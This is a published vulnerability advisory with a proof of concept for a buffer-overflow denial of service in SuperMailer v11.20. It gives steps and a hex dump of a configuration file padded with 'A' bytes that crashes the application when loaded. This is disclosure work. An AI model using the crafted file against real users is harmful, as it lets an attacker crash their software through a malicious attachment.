SuperMailer v11.20 Exploit, Buffer overflow DoS

# Exploit Title:  SuperMailer v11.20 - Buffer overflow DoS
# Exploit Author: Rafael Pedrero
# Discovery Date: 2021-02-07
# Vendor Homepage:
https://int.supermailer.de/download_newsletter_software.htm
# Software Link : https://int.supermailer.de/smintsw.zip /
https://int.supermailer.de/smintsw_x64.zip
# Tested Version: v11.20 32bit/64bit [11.20.0.2204]
# Tested on:  Windows 7, 10

CVSS v3: 3.3
CVSS vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L
CWE: CWE-20

Vulnerability description: A vulnerability in Newsletter Software
SuperMailer v11.20 32bit/64bit [11.20.0.2204] could allow an attacker to
cause a process crash resulting in a Denial of service (DoS) condition for
the application on an affected system. The vulnerability exists due to
insufficient validation of certain elements with a configuration file
malformed. An attacker could exploit this vulnerability by sending a user a
malicious SMB (configuration file) file through a link or email attachment
and persuading the user to open the file with the affected software on the
local system. A successful exploit could allow the attacker to cause the
application to crash when trying to load the malicious file.

Proof of concept:

1.- Go to File -> Save program options...
2.- Save the file (default extension *.smb)
3.- Edit file and you introduce a lot of A in somewhere. Example: DoS.smb
file

Offset(h) 00 01 02 03 04 05 06 07 08 09 0A 0B 0C 0D 0E 0F

00000000  10 03 00 00 00 00 00 00 A9 E5 7E 41 41 41 41 41  ........©å~AAAAA
00000010  41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
00000020  41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
00000030  41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
00000040  41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
00000050  41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
00000060  41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
00000070  41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
00000080  41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
00000090  41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
000000A0  41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
000000B0  41 41 97 99 E5 40 00 00 00 00 00 00 00 00 00 00  AA—™å@..........
000000C0  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000000D0  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000000E0  00 00 00 00 00 00 6B 00 00 00 53 00 6F 00 66 00  ......k...S.o.f.
000000F0  74 00 77 00 61 00 72 00 65 00 5C 00 4D 00 69 00  t.w.a.r.e.\.M.i.
00000100  72 00 6B 00 6F 00 20 00 42 00 6F 00 65 00 65 00  r.k.o. .B.o.e.e.
00000110  72 00 20 00 53 00 6F 00 66 00 74 00 77 00 61 00  r. .S.o.f.t.w.a.
00000120  72 00 65 00 5C 00 53 00 75 00 70 00 65 00 72 00  r.e.\.S.u.p.e.r.
00000130  4D 00 61 00 69 00 6C 00 65 00 72 00 5C 00 54 00  M.a.i.l.e.r.\.T.
00000140  65 00 73 00 74 00 20 00 45 00 4D 00 61 00 69 00  e.s.t. .E.M.a.i.
00000150  6C 00 20 00 41 00 64 00 64 00 72 00 65 00 73 00  l. .A.d.d.r.e.s.
00000160  73 00 65 00 73 00 00 00 00 00 00 00 00 00 00 00  s.e.s...........

And save the file.

4.- Go to File -> Restore program options...
5.- The application "sm.exe" crash.

Credits and Partners

All rights reserved nPulse.net 2009 - 2024
Powered by: MVCP 2.0-RC / BVCP / ASPF-MILTER / PHP 7.4 / NGINX / FreeBSD